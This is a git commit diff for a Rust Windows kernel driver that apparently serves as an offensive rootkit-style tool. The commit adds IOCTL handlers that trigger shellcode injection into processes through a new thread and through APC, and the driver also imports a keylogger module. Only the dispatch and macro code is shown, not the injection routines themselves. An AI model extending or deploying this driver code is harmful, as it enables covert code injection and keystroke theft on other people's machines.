Adding new IOCTLS

2026-01-01 06:34:27 +01:00 · 2024-07-30 22:03:25 -03:00
parent bd2645c180
commit 428fcc72a8
2 changed files with 19 additions and 10 deletions
--- a/driver/src/utils/ioctls.rs
+++ b/driver/src/utils/ioctls.rs
@@ -1,20 +1,18 @@
 use {
-    crate::{
-        callbacks::Callback, driver::Driver, 
-        handle_callback, handle_driver, handle_injection, 
-        handle_module, handle_process, handle_thread, 
-        keylogger::set_keylogger_state, module::Module, 
-        process::Process, thread::Thread, injection::Injection
+    crate::{*,
+        callbacks::Callback, driver::Driver,
+        injection::InjectionShellcode, keylogger::set_keylogger_state, 
+        memory::Memory, module::Module, process::Process, thread::Thread
    }, 
    alloc::boxed::Box, 
    core::mem::size_of, 
    hashbrown::HashMap, 
    lazy_static::lazy_static, 
-    wdk_sys::{IO_STACK_LOCATION, IRP, NTSTATUS},
    shared::{
        ioctls::*, 
        structs::*,
    }, 
+    wdk_sys::{IO_STACK_LOCATION, IRP, NTSTATUS} 
 };

 #[cfg(not(feature = "mapper"))]
@@ -143,9 +141,16 @@ lazy_static! {
            status
        }) as IoctlHandler);

-        ioctls.insert(IOCTL_INJECTION, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | {
-            log::info!("Received IOCTL_INJECTION");
-            let status = unsafe { handle_injection!(stack, Injection::injection_thread, TargetInjection) };
+        ioctls.insert(IOCTL_INJECTION_THREAD, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | {
+            log::info!("Received IOCTL_INJECTION_THREAD");
+            let status = unsafe { handle_injection!(stack, InjectionShellcode::injection_thread, TargetInjection) };
+            unsafe { (*irp).IoStatus.Information = 0 };
+            status
+        }) as IoctlHandler);
+
+        ioctls.insert(IOCTL_INJECTION_APC, Box::new(|irp: *mut IRP, stack: *mut IO_STACK_LOCATION | {
+            log::info!("Received IOCTL_INJECTION_APC");
+            let status = unsafe { handle_injection!(stack, InjectionShellcode::injection_apc, TargetInjection) };
            unsafe { (*irp).IoStatus.Information = 0 };
            status
        }) as IoctlHandler);
--- a/driver/src/utils/macros.rs
+++ b/driver/src/utils/macros.rs
@@ -102,6 +102,10 @@ macro_rules! handle_injection {

        $action(input_buffer)
    }};
+
+    ($action:expr) => {
+        $action()
+    }
 }

 /// Macro to handle registry-related operations.